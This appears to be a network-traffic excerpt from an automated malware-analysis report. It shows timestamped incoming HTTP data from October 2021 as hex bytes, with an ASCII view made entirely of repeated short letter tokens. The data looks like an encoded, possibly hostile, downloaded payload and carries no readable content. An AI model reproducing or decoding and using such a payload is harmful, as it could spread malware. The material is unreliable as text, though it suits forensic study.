                                                                                                                          2021-10-29 15:06:45 UTC1303INData Raw: 20 42 55 20 73 4f 7a 20 57 6b 20 4f 7a 20 57 73 20 4f 7a 20 4c 55 20 73 50 4f 20 50 50 6c 20 50 6b 55 20 50 73 73 20 6c 55 20 57 42 20 57 50 20 57 4f 20 7a 6b 20 55 6b 20 73 4f 6b 20 50 6b 55 20 50 50 73 20 57 73 20 57 4f 20 73 6b 4f 20 4f 7a 20 7a 73 20 50 50 73 20 50 50 6c 20 50 6b 6c 20 4c 20 50 57 50 20 4f 7a 20 57 6b 20 42 6b 20 50 73 4f 20 55 7a 20 50 50 6c 20 50 6b 55 20 55 50 20 73 42 20 4c 4c 20 57 6b 20 57 4f 20 50 73 6c 20 55 6b 20 73 4f 4c 20 50 6b 55 20 50 50 73 20 57 73 20 73 4f 20 50 7a 50 20 57 4f 20 7a 4f 20 50 50 42 20 50 50 57 20 50 4f 6c 20 50 50 7a 20 57 4c 20 57 6b 20 57 6b 20 4f 7a 20 4c 55 20 73 50 57 20 50 50 6c 20 50 6b 55 20 50 73 73 20 73 42 20 4c 73 20 57 6b 20 57 4f 20 50 73 6c 20 55 6b 20 50 6b 6b 20 50 6b 55 20 50 50 73 20
                                                                                                                          Data Ascii: BU sOz Wk Oz Ws Oz LU sPO PPl PkU Pss lU WB WP WO zk Uk sOk PkU PPs Ws WO skO Oz zs PPs PPl Pkl L PWP Oz Wk Bk PsO Uz PPl PkU UP sB LL Wk WO Psl Uk sOL PkU PPs Ws sO PzP WO zO PPB PPW POl PPz WL Wk Wk Oz LU sPW PPl PkU Pss sB Ls Wk WO Psl Uk Pkk PkU PPs
                                                                                                                          2021-10-29 15:06:45 UTC1304INData Raw: 20 73 50 42 20 57 4f 20 7a 4f 20 50 50 4f 20 50 73 42 20 50 6b 55 20 50 50 73 20 57 6b 20 50 55 6c 20 57 6b 20 57 4f 20 7a 4f 20 50 50 57 20 50 50 6c 20 50 6b 55 20 50 50 73 20 73 73 20 4f 7a 20 57 6b 20 57 57 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 57 4f 20 57 6b 20 4f 7a 20 57 6b 20 42 50 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 57 57 20 50 50 73 20 57 6b 20 4f 7a 20 4f 55 20 57 4f 20 7a 4f 20 50 50 4f 20 50 73 73 20 50 6b 55 20 50 50 73 20 57 50 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 4f 6c 20 4f 55 20 57 6b 20 57 4f 20 6c 4c 20 50 50 57 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 4f 7a 20 57 6b 20 50 7a 20 7a 4f 20 50 50 4f 20 50 50 42 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57
                                                                                                                          Data Ascii: sPB WO zO PPO PsB PkU PPs Wk PUl Wk WO zO PPW PPl PkU PPs ss Oz Wk WW zO PPO PPl PkU PWO Wk Oz Wk BP zO PPO PPl PWW PPs Wk Oz OU WO zO PPO Pss PkU PPs WP Oz Wk WO zO PPO PPl PkU PPs Ol OU Wk WO lL PPW PPl PkU PPL Wk Oz Wk Pz zO PPO PPB PkU PPs Wk Oz Wk W
                                                                                                                          2021-10-29 15:06:45 UTC1306INData Raw: 57 4f 20 73 4f 20 50 4c 57 20 57 4f 20 7a 4f 20 50 73 6b 20 73 42 20 73 50 55 20 50 50 73 20 57 6b 20 57 7a 20 55 4c 20 50 73 55 20 7a 4f 20 50 50 4f 20 50 73 6c 20 42 55 20 73 6b 50 20 57 50 20 4f 7a 20 57 73 20 57 6b 20 50 73 4f 20 50 4f 7a 20 50 50 6c 20 50 6b 55 20 50 50 7a 20 73 42 20 50 4c 57 20 57 50 20 57 4f 20 7a 73 20 7a 7a 20 50 6b 73 20 55 4c 20 50 73 4f 20 57 6b 20 50 42 42 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 4f 20 6c 7a 20 57 42 20 57 57 20 7a 4f 20 50 50 7a 20 7a 7a 20 6c 4c 20 50 6b 73 20 73 73 42 20 50 6b 4f 20 57 6b 20 57 4f 20 7a 57 20 55 6b 20 73 6b 57 20 50 6b 55 20 50 50 73 20 57 42 20 73 73 4f 20 42 4c 20 57 4f 20 7a 4f 20 50 50 73 20 55 4c 20 73 50 4c 20 50 50 73 20 57 6b 20 57 7a 20 73
                                                                                                                          Data Ascii: WO sO PLW WO zO Psk sB sPU PPs Wk Wz UL PsU zO PPO Psl BU skP WP Oz Ws Wk PsO POz PPl PkU PPz sB PLW WP WO zs zz Pks UL PsO Wk PBB Wk WO zO PPO PPl PkU PPs WO lz WB WW zO PPz zz lL Pks ssB PkO Wk WO zW Uk skW PkU PPs WB ssO BL WO zO PPs UL sPL PPs Wk Wz s
                                                                                                                          2021-10-29 15:06:45 UTC1307INData Raw: 4c 55 20 7a 6b 20 55 6b 20 50 4f 4f 20 50 6b 55 20 50 50 73 20 57 73 20 55 57 20 50 42 73 20 57 57 20 7a 4f 20 50 50 42 20 50 6b 6b 20 50 6b 57 20 4c 50 20 73 4f 4f 20 4f 7a 20 57 6b 20 42 6b 20 7a 6b 20 55 6b 20 73 6b 50 20 50 6b 7a 20 50 50 73 20 57 73 20 57 4f 20 55 4c 20 42 6c 20 7a 57 20 50 50 4f 20 50 50 57 20 6c 50 20 50 50 73 20 57 6b 20 4f 55 20 4f 42 20 57 4f 20 7a 4f 20 50 50 73 20 50 50 6c 20 50 73 4f 20 50 50 73 20 4f 42 20 73 55 20 57 6b 20 57 42 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 4f 20 57 6b 20 50 50 7a 20 57 6b 20 4f 73 20 57 4f 20 50 50 4f 20 50 73 4c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 50 50 42 20 57 6b 20 50 73 4f 20 73 6b 42 20 50 50 42 20 50 6b 55 20 50 50 7a 20 73 42 20 73 4c 7a 20 57 6b 20 57 4f 20 7a 73
                                                                                                                          Data Ascii: LU zk Uk POO PkU PPs Ws UW PBs WW zO PPB Pkk PkW LP sOO Oz Wk Bk zk Uk skP Pkz PPs Ws WO UL Bl zW PPO PPW lP PPs Wk OU OB WO zO PPs PPl PsO PPs OB sU Wk WB zO PPO PPl PkU PPO Wk PPz Wk Os WO PPO PsL PkU PPs Wk Oz PPB Wk PsO skB PPB PkU PPz sB sLz Wk WO zs
                                                                                                                          2021-10-29 15:06:45 UTC1308INData Raw: 20 57 4f 20 7a 73 20 73 55 20 73 73 57 20 50 6b 55 20 50 50 73 20 57 73 20 4f 6b 20 50 55 50 20 73 55 20 7a 4f 20 50 50 4f 20 50 50 55 20 6c 73 20 50 6b 73 20 42 57 20 50 42 4c 20 57 6b 20 57 4f 20 7a 73 20 73 6b 7a 20 7a 6b 20 50 73 73 20 50 50 7a 20 50 4f 4f 20 73 4f 20 50 55 50 20 57 4f 20 7a 4f 20 50 50 42 20 50 73 42 20 50 6b 42 20 50 50 57 20 55 4c 20 7a 55 20 57 50 20 57 4f 20 7a 73 20 55 6b 20 73 4f 55 20 50 6b 55 20 50 50 73 20 57 73 20 55 57 20 73 4f 7a 20 57 4f 20 7a 4f 20 50 73 6b 20 50 50 4c 20 42 55 20 73 6b 4f 20 57 50 20 4f 7a 20 57 73 20 4f 55 20 57 55 20 73 4f 4c 20 50 50 42 20 50 6b 55 20 50 50 7a 20 73 4f 20 50 42 42 20 4f 55 20 7a 55 20 57 4c 20 50 50 57 20 50 50 6c 20 50 6b 6c 20 55 73 20 4f 42 20 57 73 20 73 42 20 50 4c 7a 20 7a 57
                                                                                                                          Data Ascii: WO zs sU ssW PkU PPs Ws Ok PUP sU zO PPO PPU ls Pks BW PBL Wk WO zs skz zk Pss PPz POO sO PUP WO zO PPB PsB PkB PPW UL zU WP WO zs Uk sOU PkU PPs Ws UW sOz WO zO Psk PPL BU skO WP Oz Ws OU WU sOL PPB PkU PPz sO PBB OU zU WL PPW PPl Pkl Us OB Ws sB PLz zW
                                                                                                                          2021-10-29 15:06:45 UTC1312INData Raw: 20 7a 4f 20 50 73 6b 20 7a 55 20 50 6b 4f 20 50 6b 4c 20 4c 4c 20 57 4f 20 73 57 20 42 4c 20 6c 6b 20 50 73 73 20 55 4c 20 7a 7a 20 50 50 73 20 57 6b 20 57 7a 20 4c 50 20 73 4c 73 20 50 4c 7a 20 50 73 4f 20 50 6b 4c 20 50 6b 50 20 50 4f 73 20 4c 42 20 57 42 20 57 6b 20 57 4f 20 6c 55 20 73 55 20 50 73 42 20 50 6b 55 20 50 50 73 20 57 42 20 73 4c 42 20 4c 57 20 4f 7a 20 50 50 6b 20 50 6c 42 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4c 4c 20 57 57 20 42 55 20 4f 7a 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 55 55 20 57 42 20 4c 4c 20 57 42 20 7a 55 20 50 4c 57 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 55 55 20 57 4c 20 4c 7a 20 4c 4c 20 42 50 20 42 42 20 55 6c 20 50 73 50 20 6c 6b 20 57 6c 20 4c 57 20 57 55 20 4c 50 20 50 73 4c 20 42 42 20 55 6c 20 50 73 6b
                                                                                                                          Data Ascii: zO Psk zU PkO PkL LL WO sW BL lk Pss UL zz PPs Wk Wz LP sLs PLz PsO PkL PkP POs LB WB Wk WO lU sU PsB PkU PPs WB sLB LW Oz PPk PlB PPl PkU PPs Wk LL WW BU Oz PPO PPl PkL UU WB LL WB zU PLW PPO PPl PkL UU WL Lz LL BP BB Ul PsP lk Wl LW WU LP PsL BB Ul Psk
                                                                                                                          2021-10-29 15:06:45 UTC1316INData Raw: 50 73 20 50 50 6c 20 50 6b 55 20 50 6c 55 20 4f 7a 20 4f 7a 20 57 6b 20 57 4c 20 7a 4f 20 50 50 4f 20 50 50 6c 20 55 7a 20 50 50 73 20 57 6b 20 4f 55 20 4f 7a 20 57 4f 20 7a 4f 20 50 50 4f 20 50 6b 50 20 50 6b 55 20 50 50 73 20 57 6b 20 73 4f 4c 20 4f 7a 20 57 4f 20 7a 4f 20 50 42 50 20 50 50 55 20 50 6b 55 20 50 50 73 20 57 42 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 4f 7a 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 7a 6b 20 50 50 4f 20 57 6b 20 4f 7a 20 73 4c 6c 20 57 73 20 7a 4f 20 50 50 4f 20 50 50 7a 20 50 6b 55 20 50 50 73 20 57 6b 20 57 7a 20 57 6b 20 57 4f 20 7a 57 20 50 6b 57 20 42 55 20 50 6b 57 20 50 50 73 20 50 73 4c 20 4f 55 20 57 6b 20 57 4f 20 50 73 42 20 50 50 4f 20 50 50
                                                                                                                          Data Ascii: Ps PPl PkU PlU Oz Oz Wk WL zO PPO PPl Uz PPs Wk OU Oz WO zO PPO PkP PkU PPs Wk sOL Oz WO zO PBP PPU PkU PPs WB Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk Oz zO PPO PPl Pzk PPO Wk Oz sLl Ws zO PPO PPz PkU PPs Wk Wz Wk WO zW PkW BU PkW PPs PsL OU Wk WO PsB PPO PP
                                                                                                                          2021-10-29 15:06:45 UTC1317INData Raw: 20 50 73 6b 20 50 42 55 20 50 73 4f 20 50 50 6c 20 4c 50 20 4c 73 20 57 4c 20 4c 55 20 7a 6b 20 50 50 4c 20 50 50 4c 20 42 55 20 73 73 4f 20 57 6b 20 4f 7a 20 57 73 20 4c 6b 20 42 42 20 50 50 4f 20 50 50 6c 20 6c 6b 20 50 73 4c 20 57 55 20 55 57 20 42 73 20 57 4f 20 7a 4f 20 50 73 6b 20 7a 7a 20 73 57 57 20 50 6c 4f 20 57 42 20 57 6c 20 4c 6b 20 4f 7a 20 55 4c 20 73 55 20 50 73 42 20 50 6b 55 20 50 50 73 20 57 42 20 73 4c 42 20 73 4c 42 20 57 4c 20 50 50 4f 20 50 6c 73 20 50 50 6c 20 50 6b 57 20 55 55 20 57 7a 20 4c 7a 20 4c 4c 20 42 4c 20 50 73 6c 20 7a 4c 20 50 6b 6b 20 50 6b 50 20 55 6c 20 57 55 20 50 6c 6b 20 4c 4c 20 42 6b 20 7a 4c 20 50 50 73 20 50 6b 6b 20 50 6b 4c 20 7a 7a 20 73 4c 4c 20 4f 7a 20 57 6b 20 42 6b 20 50 73 4f 20 50 6b 6b 20 50 50 6c
                                                                                                                          Data Ascii: Psk PBU PsO PPl LP Ls WL LU zk PPL PPL BU ssO Wk Oz Ws Lk BB PPO PPl lk PsL WU UW Bs WO zO Psk zz sWW PlO WB Wl Lk Oz UL sU PsB PkU PPs WB sLB sLB WL PPO Pls PPl PkW UU Wz Lz LL BL Psl zL Pkk PkP Ul WU Plk LL Bk zL PPs Pkk PkL zz sLL Oz Wk Bk PsO Pkk PPl
                                                                                                                          2021-10-29 15:06:45 UTC1322INData Raw: 50 50 73 20 57 42 20 42 50 20 6c 42 20 4f 6b 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 73 42 20 50 50 42 20 6c 42 20 4f 42 20 57 6b 20 57 4f 20 55 4f 20 55 6c 20 50 50 73 20 50 6b 6b 20 4c 20 50 42 20 4f 7a 20 57 6b 20 42 6b 20 50 73 4f 20 7a 50 20 50 50 6c 20 50 6b 55 20 50 73 73 20 55 4c 20 73 6b 20 57 6b 20 57 4f 20 55 4f 20 55 6c 20 50 50 4c 20 50 73 4f 20 50 50 42 20 4f 57 20 42 4c 20 50 55 50 20 50 6b 7a 20 7a 4f 20 50 50 4f 20 50 50 42 20 6c 73 20 50 42 6b 20 73 50 57 20 4f 7a 20 57 6b 20 57 6b 20 50 73 4f 20 42 55 20 50 50 6c 20 50 6b 55 20 50 73 73 20 42 57 20 7a 20 57 6b 20 57 4f 20 55 4f 20 73 55 20 7a 6b 20 50 6b 55 20 50 50 73 20 57 42 20 73 7a 20 4f 6b 20 4f 6b 20 73 50 6c 20 4f 6b 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 73 4c 20 73 73 4f 20 73
                                                                                                                          Data Ascii: PPs WB BP lB Ok zO PPO Psl PsB PPB lB OB Wk WO UO Ul PPs Pkk L PB Oz Wk Bk PsO zP PPl PkU Pss UL sk Wk WO UO Ul PPL PsO PPB OW BL PUP Pkz zO PPO PPB ls PBk sPW Oz Wk Wk PsO BU PPl PkU Pss BW z Wk WO UO sU zk PkU PPs WB sz Ok Ok sPl Ok PPl PkU PPL sL ssO s
                                                                                                                          2021-10-29 15:06:45 UTC1326INData Raw: 20 73 50 4c 20 57 4f 20 7a 4f 20 50 50 4f 20 50 6b 42 20 50 50 55 20 7a 7a 20 55 42 20 4f 7a 20 57 6b 20 42 6b 20 6c 57 20 50 6b 50 20 73 4f 7a 20 57 57 20 50 50 73 20 57 6b 20 4f 55 20 73 4c 20 73 4c 6b 20 50 4c 6b 20 50 50 4f 20 50 50 6c 20 50 6b 57 20 7a 7a 20 57 20 4f 7a 20 57 6b 20 42 6b 20 4c 55 20 6c 4f 20 50 50 6c 20 50 6b 55 20 50 73 73 20 73 42 20 73 6c 20 57 6b 20 57 4f 20 55 4f 20 55 6c 20 50 73 57 20 50 6b 6c 20 4c 20 50 55 55 20 4f 7a 20 57 6b 20 4f 7a 20 6c 50 20 50 50 7a 20 50 6b 6b 20 50 6b 57 20 55 7a 20 57 50 20 73 4f 20 73 50 55 20 57 4f 20 7a 4f 20 50 73 6b 20 73 42 20 50 4c 50 20 50 50 73 20 57 6b 20 57 4f 20 4c 57 20 57 6b 20 42 6c 20 73 57 57 20 4f 6c 20 50 6b 55 20 50 50 73 20 57 50 20 73 50 20 4c 42 20 4f 50 20 50 73 42 20 73 4c
                                                                                                                          Data Ascii: sPL WO zO PPO PkB PPU zz UB Oz Wk Bk lW PkP sOz WW PPs Wk OU sL sLk PLk PPO PPl PkW zz W Oz Wk Bk LU lO PPl PkU Pss sB sl Wk WO UO Ul PsW Pkl L PUU Oz Wk Oz lP PPz Pkk PkW Uz WP sO sPU WO zO Psk sB PLP PPs Wk WO LW Wk Bl sWW Ol PkU PPs WP sP LB OP PsB sL
                                                                                                                          2021-10-29 15:06:45 UTC1330INData Raw: 42 7a 20 57 6c 20 57 6b 20 6c 6b 20 50 73 4f 20 50 6c 20 50 50 6c 20 50 6b 55 20 50 73 73 20 42 4f 20 50 73 4c 20 57 42 20 57 4f 20 4c 42 20 50 73 20 50 6b 6c 20 50 6b 55 20 50 50 73 20 57 42 20 55 57 20 4f 57 20 57 4f 20 7a 4f 20 50 73 6b 20 6c 20 73 4c 42 20 50 73 73 20 57 6b 20 42 4f 20 42 4f 20 50 4c 57 20 55 4f 20 50 50 4f 20 57 20 50 55 20 50 50 6b 20 57 6b 20 4f 7a 20 57 42 20 4c 6b 20 6c 57 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 7a 7a 20 50 50 20 4f 7a 20 57 6b 20 42 6b 20 57 55 20 50 4c 6b 20 50 50 6c 20 50 6b 55 20 50 50 7a 20 73 4c 20 42 42 20 73 4f 4c 20 42 6b 20 7a 4f 20 73 20 6c 20 50 73 6b 20 50 73 4c 20 57 6b 20 42 4f 20 6c 42 20 4f 6b 20 7a 4f 20 50 50 4f 20 50 73 6c 20 42 55 20 50 50 50 20 57 6b 20 4f 7a 20 57 42 20 4c 6b 20 6c 42 20 50
                                                                                                                          Data Ascii: Bz Wl Wk lk PsO Pl PPl PkU Pss BO PsL WB WO LB Ps Pkl PkU PPs WB UW OW WO zO Psk l sLB Pss Wk BO BO PLW UO PPO W PU PPk Wk Oz WB Lk lW PPO PPl PkL zz PP Oz Wk Bk WU PLk PPl PkU PPz sL BB sOL Bk zO s l Psk PsL Wk BO lB Ok zO PPO Psl BU PPP Wk Oz WB Lk lB P
                                                                                                                          2021-10-29 15:06:45 UTC1334INData Raw: 73 57 57 20 73 7a 20 4f 7a 20 57 6b 20 57 73 20 4f 6c 20 7a 42 20 50 50 6c 20 50 6b 55 20 50 50 42 20 55 50 20 55 57 20 50 55 73 20 57 4f 20 7a 4f 20 50 73 6b 20 73 50 57 20 7a 57 20 73 73 42 20 57 6b 20 4f 7a 20 57 6b 20 57 73 20 4f 6c 20 50 6b 73 20 50 50 6c 20 50 6b 55 20 50 50 42 20 57 4c 20 57 42 20 50 6b 42 20 50 7a 57 20 50 6b 6b 20 50 50 4f 20 50 50 6c 20 50 50 50 20 50 50 20 73 6c 20 4f 7a 20 57 6b 20 57 6b 20 42 55 20 50 73 57 20 50 6b 42 20 55 6c 20 73 57 4c 20 50 6b 4f 20 4f 7a 20 57 6b 20 57 57 20 50 50 4c 20 50 42 73 20 50 4c 57 20 50 6b 55 20 50 50 73 20 57 4f 20 73 4f 20 57 20 57 4f 20 7a 4f 20 50 73 6b 20 42 20 7a 57 20 50 50 73 20 57 6b 20 57 7a 20 73 42 20 7a 7a 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 50 50 20 50 50 20 4c 4f 20 4f 7a 20
                                                                                                                          Data Ascii: sWW sz Oz Wk Ws Ol zB PPl PkU PPB UP UW PUs WO zO Psk sPW zW ssB Wk Oz Wk Ws Ol Pks PPl PkU PPB WL WB PkB PzW Pkk PPO PPl PPP PP sl Oz Wk Wk BU PsW PkB Ul sWL PkO Oz Wk WW PPL PBs PLW PkU PPs WO sO W WO zO Psk B zW PPs Wk Wz sB zz zO PPO Psl PPP PP LO Oz
                                                                                                                          2021-10-29 15:06:45 UTC1338INData Raw: 50 7a 20 55 4c 20 55 6b 20 50 50 73 20 57 6b 20 57 7a 20 42 57 20 50 4f 20 7a 4f 20 50 50 4f 20 50 73 6c 20 42 55 20 4c 6b 20 57 6b 20 4f 7a 20 57 42 20 57 73 20 4f 6c 20 55 7a 20 50 50 6c 20 50 6b 55 20 50 50 42 20 4c 57 20 57 7a 20 4c 57 20 57 55 20 50 73 20 55 55 20 50 73 4c 20 50 73 4c 20 73 4c 6b 20 50 6b 42 20 4c 4c 20 42 6b 20 4c 4c 20 50 55 4f 20 4f 73 20 50 6b 6b 20 55 55 20 50 6b 4f 20 50 42 4f 20 50 6b 4f 20 4c 57 20 57 42 20 6c 6c 20 73 73 7a 20 4f 57 20 4f 20 55 6c 20 42 6b 20 4f 73 20 50 42 4f 20 55 57 20 57 55 20 50 73 7a 20 50 50 6c 20 50 6b 55 20 50 73 73 20 6c 55 20 73 4f 20 57 6b 20 57 4f 20 7a 6b 20 6c 4f 20 73 4c 57 20 50 6b 55 20 50 50 73 20 57 6b 20 57 6b 20 6c 4c 20 57 6c 20 7a 4f 20 50 50 4f 20 50 50 4c 20 50 50 6c 20 73 42 20 50
                                                                                                                          Data Ascii: Pz UL Uk PPs Wk Wz BW PO zO PPO Psl BU Lk Wk Oz WB Ws Ol Uz PPl PkU PPB LW Wz LW WU Ps UU PsL PsL sLk PkB LL Bk LL PUO Os Pkk UU PkO PBO PkO LW WB ll ssz OW O Ul Bk Os PBO UW WU Psz PPl PkU Pss lU sO Wk WO zk lO sLW PkU PPs Wk Wk lL Wl zO PPO PPL PPl sB P
                                                                                                                          2021-10-29 15:06:45 UTC1342INData Raw: 50 50 4f 20 73 42 20 7a 73 20 57 6b 20 57 4f 20 55 4f 20 7a 7a 20 55 55 20 50 50 6b 20 50 6b 4f 20 73 6b 4f 20 4f 55 20 73 4f 20 57 4f 20 7a 4f 20 50 6b 57 20 42 55 20 50 6b 4f 20 50 50 73 20 42 6c 20 4f 7a 20 57 6b 20 57 4f 20 50 50 50 20 50 50 4f 20 50 50 6c 20 50 73 4f 20 50 50 57 20 55 4c 20 50 57 4c 20 57 50 20 57 4f 20 7a 73 20 50 6b 50 20 73 4f 7a 20 57 4c 20 50 50 73 20 57 6b 20 4f 55 20 73 4c 20 4c 73 20 4c 7a 20 50 6c 73 20 50 50 4f 20 50 6b 55 20 6b 20 50 4f 4f 20 4c 55 20 55 4c 20 50 73 6b 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 6b 4c 20 4c 20 57 50 20 4f 55 20 57 6b 20 42 6b 20 7a 73 20 50 6b 6b 20 73 4c 55 20 50 6b 6c 20 50 6b 4c 20 50 42 7a 20 73 4f 20 7a 50 20 57 4f 20 7a 4f 20 50 73 6b 20 55 4c 20 50 50 50 20 50 50 4c 20 57 6b 20 57 7a 20
                                                                                                                          Data Ascii: PPO sB zs Wk WO UO zz UU PPk PkO skO OU sO WO zO PkW BU PkO PPs Bl Oz Wk WO PPP PPO PPl PsO PPW UL PWL WP WO zs PkP sOz WL PPs Wk OU sL Ls Lz Pls PPO PkU k POO LU UL Psk zO PPO Psl PkL L WP OU Wk Bk zs Pkk sLU Pkl PkL PBz sO zP WO zO Psk UL PPP PPL Wk Wz
                                                                                                                          2021-10-29 15:06:45 UTC1346INData Raw: 42 73 20 50 42 20 6c 6b 20 50 50 73 20 50 4c 55 20 50 73 6b 20 42 6c 20 57 6b 20 4f 7a 20 4f 50 20 42 73 20 50 73 6c 20 57 55 20 50 50 20 50 73 4c 20 50 50 4c 20 57 6b 20 57 73 20 73 4c 20 73 6c 20 42 6c 20 7a 4f 20 50 50 20 50 73 50 20 50 50 4c 20 57 6b 20 57 73 20 73 6b 4f 20 4f 7a 20 6c 73 20 50 50 73 20 50 50 6c 20 50 6b 6c 20 4c 20 4f 50 20 4f 55 20 57 6b 20 42 6b 20 50 50 4c 20 73 4f 73 20 55 55 20 50 6b 7a 20 50 50 73 20 57 4f 20 73 4f 20 4f 57 20 57 4f 20 7a 4f 20 7a 55 20 7a 6b 20 42 4f 20 50 73 4f 20 73 6b 20 4c 4f 20 4f 7a 20 73 6b 6b 20 42 57 20 42 57 20 50 50 6c 20 50 6b 55 20 50 6b 6c 20 57 7a 20 73 6c 20 4c 42 20 4f 7a 20 50 6c 6b 20 50 50 42 20 50 6b 55 20 50 50 50 20 50 50 73 20 57 73 20 42 6c 20 4f 6c 20 57 57 20 7a 4f 20 50 73 6b 20 55
                                                                                                                          Data Ascii: Bs PB lk PPs PLU Psk Bl Wk Oz OP Bs Psl WU PP PsL PPL Wk Ws sL sl Bl zO PP PsP PPL Wk Ws skO Oz ls PPs PPl Pkl L OP OU Wk Bk PPL sOs UU Pkz PPs WO sO OW WO zO zU zk BO PsO sk LO Oz skk BW BW PPl PkU Pkl Wz sl LB Oz Plk PPB PkU PPP PPs Ws Bl Ol WW zO Psk U
                                                                                                                          2021-10-29 15:06:45 UTC1349INData Raw: 4f 20 50 50 4f 20 50 73 6c 20 73 6b 6c 20 7a 57 20 4c 6c 20 4c 55 20 4c 7a 20 4c 6b 20 73 4c 73 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 73 50 6b 20 73 4c 20 4f 6b 20 4c 6c 20 4c 4f 20 50 73 4f 20 73 6b 42 20 50 50 6c 20 50 6b 55 20 50 73 73 20 50 4f 4f 20 73 50 20 4f 4c 20 4c 73 20 42 4f 20 55 6b 20 73 6b 50 20 50 6b 55 20 50 50 73 20 57 42 20 50 4f 42 20 73 42 20 50 4c 55 20 7a 4f 20 50 50 4f 20 50 73 6c 20 42 55 20 4f 55 20 57 50 20 4f 7a 20 57 42 20 50 7a 73 20 6c 4c 20 50 50 57 20 50 50 6c 20 50 6b 57 20 50 4f 20 4f 6c 20 4f 55 20 57 6b 20 57 6b 20 4f 6c 20 4f 7a 20 50 50 42 20 50 6b 55 20 50 73 73 20 6c 42 20 4f 57 20 57 50 20 57 4f 20 7a 6b 20 50 73 73 20 55 55 20 50 73 4c 20 4c 20 50 50 4c 20 4f 55 20 57 6b 20 42 6b 20 42 42 20 50 6b 6b 20 42 20 4f
                                                                                                                          Data Ascii: O PPO Psl skl zW Ll LU Lz Lk sLs PPO PPl PkL sPk sL Ok Ll LO PsO skB PPl PkU Pss POO sP OL Ls BO Uk skP PkU PPs WB POB sB PLU zO PPO Psl BU OU WP Oz WB Pzs lL PPW PPl PkW PO Ol OU Wk Wk Ol Oz PPB PkU Pss lB OW WP WO zk Pss UU PsL L PPL OU Wk Bk BB Pkk B O
                                                                                                                          2021-10-29 15:06:45 UTC1354INData Raw: 20 57 6b 20 6c 6c 20 4f 7a 20 4f 55 20 42 6b 20 7a 4f 20 50 50 4f 20 50 50 42 20 50 50 50 20 50 50 73 20 73 7a 20 4f 7a 20 50 6b 7a 20 50 7a 42 20 7a 4f 20 50 73 6b 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 57 6b 20 57 6b 20 50 6c 20 7a 4f 20 4c 20 73 4c 6c 20 50 6b 55 20 50 73 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 42 20 50 50 4f 20 7a 57 20 50 6b 55 20 73 4f 4f 20 50 57 6b 20 4f 7a 20 57 42 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 73 20 4f 7a 20 50 57 73 20 50 4c 4f 20 7a 4f 20 50 50 4c 20 50 73 6c 20 50 6b 55 20 50 50 73 20 57 50 20 4f 4c 20 73 20 57 50 20 7a 4f 20 50 42 57 20 50 50 6c 20 50 6b 55 20 50 50 73 20 50 73 50 20 4f 7a 20 57 6b 20 4c 55 20 4c 55 20 73 50 42 20 50 50 6c 20 50 6b 55 20 50 73 73 20 57
                                                                                                                          Data Ascii: Wk ll Oz OU Bk zO PPO PPB PPP PPs sz Oz Pkz PzB zO Psk PPl PkU PPs Wk Wk Wk Pl zO L sLl PkU Pss Wk Oz Wk WO zB PPO zW PkU sOO PWk Oz WB WO zO PPO PPl PkU PPs Ws Oz PWs PLO zO PPL Psl PkU PPs WP OL s WP zO PBW PPl PkU PPs PsP Oz Wk LU LU sPB PPl PkU Pss W
                                                                                                                          2021-10-29 15:06:45 UTC1358INData Raw: 6b 55 20 50 50 4f 20 57 6b 20 4f 7a 20 57 6b 20 50 57 20 7a 4f 20 50 50 4f 20 50 50 6c 20 42 4f 20 50 50 4c 20 57 6b 20 4f 7a 20 7a 4f 20 57 57 20 7a 4f 20 50 50 4f 20 50 73 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 73 20 4f 7a 20 57 6b 20 57 4f 20 57 42 20 50 50 57 20 50 50 6c 20 50 6b 55 20 73 20 57 50 20 4f 7a 20 57 6b 20 57 4c 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 4c 20 50 50 73 20 57 6b 20 4f 55 20 4f 50 20 42 20 7a 50 20 50 50 4f 20 73 4f 6b 20 50 50 50 20 50 50 73 20 57 6b 20 50 73 6c 20 57 6b 20 57 4f 20 42 55 20 50 20 73 50 6b 20 50 6b 55 20 50 50 73 20 57 42 20 57 7a 20 50 7a 20 50 7a 6c 20 7a 4f 20 50 50 4f 20 50 50 6c 20 73 73 4f 20 4f 73 20 57 6b 20 4f 7a
                                                                                                                          Data Ascii: kU PPO Wk Oz Wk PW zO PPO PPl BO PPL Wk Oz zO WW zO PPO Psl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Ws Oz Wk WO WB PPW PPl PkU s WP Oz Wk WL zO PPO PPl PkL PPs Wk OU OP B zP PPO sOk PPP PPs Wk Psl Wk WO BU P sPk PkU PPs WB Wz Pz Pzl zO PPO PPl ssO Os Wk Oz
